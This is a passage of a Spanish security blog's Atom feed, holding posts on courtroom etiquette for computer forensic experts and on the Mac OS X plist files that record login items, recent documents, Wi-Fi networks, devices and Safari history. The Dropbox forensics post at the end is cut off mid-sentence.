cuidado en un Juicio&lt;/u&gt; y lo digo por experiencia ya que me he llevado más de un "tirón de orejas".&lt;br /&gt;&lt;br /&gt;&lt;b&gt;El juez&lt;/b&gt; es la autoridad pública que sirve en un tribunal de justicia. También se caracteriza como la persona que resuelve una controversia o que decide el destino de un imputado, tomando en cuenta las evidencias o pruebas presentadas en un juicio.&lt;br /&gt;&lt;br /&gt;Partiendo de "quien manda" en la sala y quien toma decisiones es aconsejable tener en cuentas las siguientes recomendaciones:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;La puntualidad:&lt;/b&gt; Aquí no valen escusas, ya te han informado por activa y por pasiva con una carta certificada en la que se presenta un Policía Urbano o Municipal para entregártela en mano. No vale decir "no encontré aparcamiento" o "el tráfico era imposible". Os aseguro que son impasibles y a parte de la bronca puedes llevarte un susto económico. Normalmente es más fácil que el Juicio se retrase por ellos mismos que por ti, pero no lo pongas en prueba.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;La vestimenta:&lt;/b&gt; Ves normal, tirando para "bien vestido", entre los procuradores, abogados y jueces ya nos tienen demonizados como "Frikis", no pienses que ir de negro o con un sombrero va a parecer que sabes más que nadie de seguridad. Es conveniente ir "duchado" y de "Sport Casual" o con un traje (puedes no llevar corbata). Digo esto ya que recuerdo que en un juicio se retraso (y menuda se la gastaba la Señora Juez) dado que uno de los muchos peritos que nos acompañaron en las pruebas tuvo que quitarse tal cantidad de anillos, pulseras y collares porque todos ellos "cantaban" en el control de acceso.&lt;br /&gt;&lt;br /&gt;En otra ocasión el perito de la parte contraria tenía tal cantidad de piercings y tatuajes de colores por todo el cuerpo que parecía salido del mismo infierno, cada vez que hablaba, creo tener la sensación (que creo hablar por todos) que iba a realizar un conjuro y que moriríamos allí mismo. Si quería llamar la atención lo hizo.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;No vayas de erudito:&lt;/b&gt; Cuando empiece tu exposición, se claro y didáctico, hazles entender a todos y comprender, no hables de algoritmos ni te metas en jardines de los que no sepas salir. No utilices tecnicismos, que si el HOST con DCHP que no le funciona el WINS, es porque el HAXOR hizo un DDOS. ¿ok?.&lt;br /&gt;También recuerdo un caso en el que el 'erudito' de la parte contraria que tenía todos los máster del universo nos dio a todos una magistral clase de clave pública y privada que todavía están pensado los de la sala de que planeta han sacado a este. Es como si a mi padre le hablo en hexadecimal.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Tu NO decides:&lt;/b&gt; Evita dar conclusiones, no digas cosas como "está claro, yo pienso que es pederasta" o según las pruebas "está claro que 'pepito' ha defraudado". FAIL. Eso lo decide el Juez, es más se molestan y te puedes llevar una lección por decir quien tiene que decidir. También tienes que hablar cuando te lo digan, nunca grites ni te adelantes aunque te acusen de que el trabajo no esté bien realizado. Nunca hables al Juez salvo que este inicie la conversación o veas que hay un ambiente distendido. Si te hablan de usted tú te diriges de Señoría. Recuerdo otro caso en el que el Juez hablaba al perito de usted y este de tu. A la cuarta o quinta vez le llamo la atención y no se me olvidará nunca lo que le dijo: "Usted será experto de todo y veo por primera vez a un licenciado que ha suspendido la educación básica". En resumen se transparente.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Ves preparado y se un profesional:&lt;/b&gt; Si vives de esto, llévatelo todo documentado, repasa la línea de tiempo, al imputado y las pruebas, no dejes nada al azar. Cuando empezaba en esto, me paso a mí. Me deje las anotaciones del caso y tuve que tirar de memoria, me metí en un pozo dado que no recordaba muchas cosas hasta que el abogado me "tiro una cuerda". La Juez se dio cuenta y me "tiro de las orejas". Dije que jamás me pasaría y hasta el día de hoy así ha sido.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;No pisar la manguera:&lt;/b&gt; En esta profesión todos los que nos dedicamos a seguridad, peritos y analistas somos bomberos y claro, entre bomberos no nos vamos a pisar la manguera ¿no?&amp;nbsp; Nada de meternos con los peritos contrarios, ni con el trabajo que hayan realizado. Nosotros a lo nuestro, nuestro trabajo y evidencias, si lo hemos realizado bien no hay nada que temer. En el caso de que sea un contra informe habrá que rebatir con evidencias y no con suposiciones. Piensa que entre abogados aunque parezcan que estén en guerra se llevan bien y a unas malas ellos no pierden, negocian y santas pascuas, así que no te metas en su guerra. Recuerda hay una norma no escrita que indica que entre peritos de una y la otra parte no hemos de atacarnos, no incumplas la norma. Como mínimo en Juicio, luego discute lo que gustes.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Paciencia:&lt;/b&gt; Ya sé que es casi imposible, que llevas dos o tres horas escuchando a unos y a otros y que lo que más deseas es tomar unas cervezas y olvidarte del asunto o quizás abrir tu portátil y empezar a trabajar. ¡¡Pues no!! Conténtate con abrir el correo en tu móvil y eso si a escondidas y procura que no suene. Si suena la has cagado!&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Pepinos asesinos (que están de moda)&lt;/b&gt;: Cuidadin con las preguntas y acusaciones de los fiscales y abogados, uno de ellos en un juicio me soltó dos "pepinos asesinos “comento: "Demuestre la existencia de TCP/IP" y la otra no menos interesante "enumere los peligros de Internet". Toma ya, pensaba que tenía que hacerlo de forma alfabética! Ante estas preguntas no te pongas nervioso y ten paciencia y si no tiene solución dilo claro y conciso, en un caso dado puedes poner ejemplos de la vida mundana o del día a día.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;No te impresiones&lt;/b&gt;: Escuches lo escuches, seguramente se convertirá en una anécdota en el momento que cruces la puerta del juzgado y te preguntaras "¿quien me manda a mi meterme en esto?". No te preocupes,&amp;nbsp; una vez realizado una, todas son iguales.&lt;br /&gt;&lt;br /&gt;Bueno, con estas y otras anécdotas, tengo para escribir un libro, pero ya debo uno al bueno de &lt;a href="http://www.elladodelmal.com/"&gt;Chema Alonso&lt;/a&gt;, así que me voy a poner en ello.&amp;nbsp; Eso es todo amigos!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-4328526897627303740?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/4328526897627303740/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=4328526897627303740' title='3 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/4328526897627303740'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/4328526897627303740'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2011/06/recomendaciones-en-un-juicio.html' title='Recomendaciones en un juicio'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-yo3Wb5jla5s/Tepr3mGJyHI/AAAAAAAACc0/8b268nI4X5k/s72-c/Captura.PNG' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-2571879248959897317</id><published>2011-05-25T22:15:00.000+02:00</published><updated>2011-05-25T22:15:40.063+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Forensics Mac'/><category scheme='http://www.blogger.com/atom/ns#' term='OSX'/><category scheme='http://www.blogger.com/atom/ns#' term='Mac'/><title type='text'>Forensics Mac OSX (plist vs Registry)</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-DKf3phZkQ3Q/Td1Nmd6h4JI/AAAAAAAACcw/XPmp6tAt4uc/s1600/Windows-to-mac.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-DKf3phZkQ3Q/Td1Nmd6h4JI/AAAAAAAACcw/XPmp6tAt4uc/s1600/Windows-to-mac.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Hola lectores,&lt;br /&gt;&lt;br /&gt;Este post explora algunos de los lugares clave donde se puede encontrar información en una investigación sobre un Mac OSX&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;En el mundo que nos toca, los Macintosh se están convirtiendo en 'ordenadores' muy populares, como bien dice un amigo los Mac son divertidos. Por esta razón, es importante que los analistas forenses puedan entender dónde pueden encontrar información similar a la que ya existe en Windows.&lt;br /&gt;&lt;br /&gt;Dentro de la estructura de ficheros de OSX nos encontramos con un juego muy interesante de ficheros llamados 'plist'&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Archivos plist&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;En primer lugar, es importante saber lo que es una lista de propiedades (plist) y el tipo de información que se puede almacenar en su interior. Los desarrolladores de Apple describen el plist de la siguiente manera, "Es un conjunto de ficheros que organizan los datos en valores &amp;nbsp;asociando varios tipos de objetos. Estos objetos contienen una lista de propiedades que permiten a dispositivos y programas funcionar de una manera muy eficiente." No queda muy claro ¿verdad?.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Yo diria que los ficheros 'plist' pueden ser considerados como el "Registro" para OSX. &amp;nbsp;La información que se almacena en estos archivos es diferente para cada programa en el sistema. Cada uno contiene la configuración para el programa, que llama a la plist. Al igual que en Windows las entradas del Registro, si cambia un valor en el archivo, el programa se ejecutará de manera diferente.&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;Los Plists pueden estar en tres formatos diferentes, siendo lo normal que sean en XML. Este formato es más portátil &amp;nbsp;y se pueden editar de forma manual. Los otros formatos están en binarios y ASCII. El formato binario se siguen utilizando hoy en día, pero rara vez se encuentra un plist con formato ASCII. Los Plists en formato binario se ejecutarán mas rápidamente si contiene una gran cantidad de valores.&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;div&gt;Evidentemente, es muy incomodo de leer en este formato 'a pelo', por lo que el sistema operativo incorpora un editor propio para estos ficheros. En la siguiente pantalla tenemos un fichero 'a pelo' con TextEdit y el mismo abierto con la propia utilidad que viene en el sistema operativo&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-MQIEo3VZNNc/TdygJ3PcHhI/AAAAAAAACcM/bifYKHL3I5k/s1600/Captura+de+pantalla+2011-05-25+a+las+08.19.04.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="305" src="http://3.bp.blogspot.com/-MQIEo3VZNNc/TdygJ3PcHhI/AAAAAAAACcM/bifYKHL3I5k/s320/Captura+de+pantalla+2011-05-25+a+las+08.19.04.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;TIPOS DE PLIST&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Autorun&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;En un Mac, la ubicación de esta información está en el fichero com.apple.loginitems.plist. En su mayor parte, cuando alguien instala un programa en una máquina Windows, el programa tiene una configuración predeterminada de inicio en el arranque. Por ejemplo una vez instalado el Messenger, este se iniciará automáticamente en el arranque a menos que le indiquen lo contrario. En Mac si uno quiere tener un inicio de un programa debe indicarle al programa que lo haga. &lt;br /&gt;&lt;br /&gt;El fichero com.apple.loginitems.plist se puede encontrar en la siguiente ubicación: &lt;b&gt;/usuario/LibraryPreferences/com.apple.loginitems.plist.&lt;/b&gt;&lt;br /&gt;&lt;div&gt;&lt;div style="font-family: Verdana,Arial,sans-serif; font-size: 11px; padding: 0.5em;"&gt;&lt;span class="Apple-style-span" style="font-family: Times;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,Arial,sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;b&gt;Documentos recientes&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;En Windows, el registro contiene las entradas de documentos usados ​​más recientemente (MRU). El MRU es una lista de programas recientes y archivos accedidos. Además de la MRU, Windows tiene la entrada UserAssist. Esta entrada contiene información acerca de los programas más utilizado por un usuario. Estas entradas están cifradas con el algoritmo de ROT-13.&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;En el entorno Mac, estas listas son más limitadas. Se hayan dentro de la carpeta &lt;b&gt;/usuario/Library/Preferences/com.apple.recentitems.plist&lt;/b&gt;.&amp;nbsp; y por defecto, Mac OS X hace un seguimiento de los últimos 10 accesos&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-b6COY65DhoQ/TdynqmLLI9I/AAAAAAAACcQ/ZryDblB_wSw/s1600/Captura+de+pantalla+2011-05-25+a+las+08.53.48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="278" src="http://3.bp.blogspot.com/-b6COY65DhoQ/TdynqmLLI9I/AAAAAAAACcQ/ZryDblB_wSw/s320/Captura+de+pantalla+2011-05-25+a+las+08.53.48.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;En la pantalla anterior se puede apreciar el nombre de los servidores "Windows 7", "Time Capsule" y el documento IRPF1.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;b&gt;Redes inalámbricas&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;El SSID o identificador de una conexión de red inalambrica se registra en Mac OSX. Esto puede incluir conexiones a los hotspots Wi-Fi &amp;nbsp;o puntos de acceso similares. En el Registro de Windows, el SSID se almacena en una clave y la configuración, tales como la dirección IP, máscara de subred y otra información sobre una red particular, se almacena en otra clave.&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Esto es similar en un Mac. Los dos plist a tener en cuenta se pueden encontrar en las siguientes ubicaciones:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;hd/Library/ Preferences/SystemConfiguration/com.apple.airport.prefrences.plist&lt;/b&gt; &lt;br /&gt;&lt;b&gt;hd/Library/Preferences/SystemConfiguration/com.apple.network.identification.plist&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Mediante el uso de estos archivos a la vez, se puede ver la última fecha en que el ordenador estaba conectado a esa red mirando el &lt;b&gt;com.apple.airport.preferences.plist&lt;/b&gt;. Por ejemplo, la siguiente pantalla se puede ver la red WLAN_11 y parte de su contraseña, así como una red abierta de nombre eus-wireless.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-M9HdJCGDVOo/Tdyr1Qfry6I/AAAAAAAACcU/ET3vwiBLi-U/s1600/Captura+de+pantalla+2011-05-25+a+las+09.10.43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="236" src="http://2.bp.blogspot.com/-M9HdJCGDVOo/Tdyr1Qfry6I/AAAAAAAACcU/ET3vwiBLi-U/s320/Captura+de+pantalla+2011-05-25+a+las+09.10.43.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;Una vez que el analista tiene la fecha y hora puede ir a la plist de identificación de red. Allí se encontrará con más información acerca de la red, incluyendo: servidores DNS, dirección IP, la interfaz utilizada (por cable o inalámbrica), máscara de subred y el router. En la siguiente pantalla podemos apreciar los DNS's&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-iLFBLJQz2pg/Td0Di7rdE0I/AAAAAAAACcY/fsSj2Le36wc/s1600/dnss.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="104" src="http://4.bp.blogspot.com/-iLFBLJQz2pg/Td0Di7rdE0I/AAAAAAAACcY/fsSj2Le36wc/s320/dnss.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Según los ficheros plist ubicados en la carpeta &lt;b&gt;/hd/Library/Preferences/SystemConfiguration&lt;/b&gt;, el analista puede determinar cuando un sospechoso estaba conectado a una red. Se puede utilizar los servidores DNS para averiguar el ISP, así como la lista de redes y timestamp de accesos.&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;b&gt;Los dispositivos que se han montado o detectado&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;En una máquina Windows cuando se inserta un dispositivo el número de serie para el dispositivo (si es USB) está registrado, por lo que es más fácil de probar que un determinado USB se conecta al ordenador del sospechoso. Algunos dispositivos USB no tienen un número de serie por lo que Windows crea una cadena aleatoria en lugar del número de serie.&lt;br /&gt;&lt;br /&gt;En el Mac, el plist &lt;b&gt;/usuario/Library/Preferences/com.apple.finder.plist&lt;/b&gt;, muestra todos los dispositivos como USB, ISO, CD, DVD o iPod, que están o se han conectado al ordenador.&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-Gpoh0HF6II4/Td0J_MRg-DI/AAAAAAAACcc/kQVIZgCluXo/s1600/Captura+de+pantalla+2011-05-25+a+las+15.53.30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="115" src="http://3.bp.blogspot.com/-Gpoh0HF6II4/Td0J_MRg-DI/AAAAAAAACcc/kQVIZgCluXo/s320/Captura+de+pantalla+2011-05-25+a+las+15.53.30.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;Cuando un usuario descarga un programa en un Mac, un archivo con extensión DMG se abre con el fin de instalar el programa. Esto es equivalente a un EXE en Windows. En el Mac, estos archivos están montados para que el usuario vea el programa de instalación. También podemos con este 'plist' ver que ficheros DMG que se han montado (o instalado)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/--Axeoix1N6M/Td0LF6aekII/AAAAAAAACcg/7nA87hHWbbk/s1600/Captura+de+pantalla+2011-05-25+a+las+15.58.09.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="143" src="http://2.bp.blogspot.com/--Axeoix1N6M/Td0LF6aekII/AAAAAAAACcg/7nA87hHWbbk/s320/Captura+de+pantalla+2011-05-25+a+las+15.58.09.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Este elemento lo suelo utilizar muy a menudo si el tema tiene que ver con licencias de software fraudulentas o violación de la propiedad intelectual y hablando de esto recuerdo un caso de un acusado que además de ser un amante de la música, guardaba todo tipo de imágenes con pornografía infantil dentro de un IPOD. En el siguiente plist nos detectaría esta información&amp;nbsp;&lt;span class="Apple-style-span" style="font-family: Verdana,Arial,sans-serif; font-size: 11px;"&gt;&amp;nbsp;&lt;span class="Apple-style-span" style="font-family: Times;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;b&gt;/usuario/Library/Preferences/com.apple.iPod.plist&lt;/b&gt;. Con este archivo, podemos verificar si el iPod se ha conectado a ese equipo.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,Arial,sans-serif; font-size: 11px;"&gt;&lt;span class="Apple-style-span" style="font-family: Times;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Historial de Internet&lt;br /&gt;&lt;br /&gt;Safari&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Safari es el navegador de Internet &amp;nbsp;que viene nativo en un Mac. En Windows, Internet Explorer &amp;nbsp;dispone en el registro tres subclaves: principal, TypedURLs y directorio de descarga. En un Mac, Safari cuenta con una configuración similar. Estos archivos se encuentran en &lt;b&gt;/usuario/Library/Caches/Safari.&lt;/b&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;En la siguiente pantalla y utilizando el programa &lt;b&gt;Juicer &lt;/b&gt;se puede ver como ha regenerado la carpeta cache, reconstruyendo en formato de carpetas y añadiendo el fichero INDEX.HTML que contiene todas las imágenes.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-jwJVuuOcpyA/Td0QUsWq_UI/AAAAAAAACck/wsQ2tpI8OVA/s1600/juicer.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="161" src="http://2.bp.blogspot.com/-jwJVuuOcpyA/Td0QUsWq_UI/AAAAAAAACck/wsQ2tpI8OVA/s320/juicer.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,Arial,sans-serif; font-size: 11px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;Otro gran lugar para buscar evidencias es el historial del navegador. El plist que se encuentra en &lt;b&gt;/usuario/ Library/ Safari/History.plist&lt;/b&gt; proporciona todos los detalles.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-50j_sa4r6Ls/Td0RqsnYk9I/AAAAAAAACco/MCOLXc-ESMM/s1600/Captura+de+pantalla+2011-05-25+a+las+16.25.51.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="75" src="http://2.bp.blogspot.com/-50j_sa4r6Ls/Td0RqsnYk9I/AAAAAAAACco/MCOLXc-ESMM/s320/Captura+de+pantalla+2011-05-25+a+las+16.25.51.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;Otro archivo no menos interesante es el fichero &lt;b&gt;downloads.plist&lt;/b&gt; que permite saber que ficheros se han descargado desde Safari&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;b&gt;Aplicaciones&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Al igual que en el mundo de Windows, cuando un usuario instala un programa, una carpeta, se crea para ese programa. En Windows, la carpeta se crea normalmente en archivos de programa, y ​​contiene los archivos ejecutables y otros importantes como las DLL's o ficheros de parámetros.&lt;br /&gt;&lt;br /&gt;En un Mac, el ejecutable se coloca en la carpeta de aplicaciones, y todos los demás archivos importantes que se necesitan para ejecutar el programa se colocan en la carpeta de &lt;b&gt;Aplication support&lt;/b&gt;, que se encuentra a su vez en&lt;b&gt; /usuario/Library/&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;En Windows, en su mayor parte, cuando un usuario desinstala un programa, todos los archivos y carpetas relacionadas con ese programa son posteriormente eliminados. En un Mac, esto no es cierto. Cuando un usuario desinstala o elimina un programa, todo lo que estamos haciendo es eliminar el ejecutable de la carpeta de aplicaciones. La carpeta de Aplication support seguirá conteniendo todos los archivos asociados con ese programa.&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-hb5o2IyxxdM/Td0WiZLjRnI/AAAAAAAACcs/sNSmTxZz9QM/s1600/Captura+de+pantalla+2011-05-25+a+las+16.46.20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="220" src="http://3.bp.blogspot.com/-hb5o2IyxxdM/Td0WiZLjRnI/AAAAAAAACcs/sNSmTxZz9QM/s320/Captura+de+pantalla+2011-05-25+a+las+16.46.20.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Resumiendo lo que hemos visto:&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;b&gt;Autorun:&lt;/b&gt;/usuario/Library/Preferences/com.apple.loginitems.plist&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Documentos recientes:&lt;/b&gt;/usuario/Library/Preferences/ com.apple.recentitems.plist&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Redes inalámbricas:&lt;/b&gt;hd/Library/Preferences/SystemConfiguration/com.apple.airport.prefrences.plist hd/Library/Preferences/SystemConfiguration/com.apple.network.identification.plist&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Dispositivos detectados&lt;/b&gt;/usuario/Library/Preferences/com.apple.finder.plist&lt;br /&gt;/usuario/Library/Preferences/com.apple.iPod.plist&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Historial de internet&lt;/b&gt;usuario/Library/Safari/History.plist&lt;br /&gt;usuario/Library/Safari/downloads.plist&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Aplicaciones&lt;/b&gt;&lt;br /&gt;/usuario/Library/Aplication Support&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Conclusiones&lt;/b&gt;:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;Como comentaba al principio del post, el Mac está creciendo con una gran popularidad y es importante los que nos dedicamos al análisis forense y a la seguridad el estar al día sobre estos temas (Os recomiendo la lectura del blog &lt;a href="http://www.seguridadapple.com/"&gt;Seguridad Apple&lt;/a&gt;), a buen seguro que nos encontraremos cada vez con más análisis de productos de Apple. (¿quien no tiene un iPad o un iphone en la empresa?)&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;div&gt;Se que no he abordado otros ficheros plist, pero por no hacer extenso el post y como en el futuro pondré temas relacionados con Mac OSX a buen seguro que hablaremos de estos ficheros. Tengo un caso muy interesante de una denegación de servicio utilizando como Bots una red de Mac OSX, pero eso será más adelante...&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-2571879248959897317?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/2571879248959897317/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=2571879248959897317' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/2571879248959897317'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/2571879248959897317'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2011/05/forensics-mac-osx-plist-vs-registry.html' title='Forensics Mac OSX (plist vs Registry)'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-DKf3phZkQ3Q/Td1Nmd6h4JI/AAAAAAAACcw/XPmp6tAt4uc/s72-c/Windows-to-mac.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-1704980250987174089</id><published>2011-05-17T08:16:00.002+02:00</published><updated>2011-05-17T12:02:31.607+02:00</updated><title type='text'>Dónde estará mi carro...(Forensics DropBox)</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-mUfur5mWNBQ/TdIK199It_I/AAAAAAAACcA/w6HMT07pW38/s1600/Dropbox.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="185" id=":current_picnik_image" src="http://3.bp.blogspot.com/-mUfur5mWNBQ/TdIK199It_I/AAAAAAAACcA/w6HMT07pW38/s200/Dropbox.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Hola lectores,&lt;br /&gt;&lt;br /&gt;Ante todo pedimos disculpas por el retraso en el blog, la verdad que para mi han sido épocas de grandes cambios y muchos viajes, ante todo en el ámbito profesional, pero una vez todo establecido, continuemos con nuestros 'casos forenses', lo dicho espero que me disculpéis.&lt;br /&gt;&lt;br /&gt;Emulando a la famosa canción que indica el título del post "mi carro me lo robaron, estando de romería!&lt;br 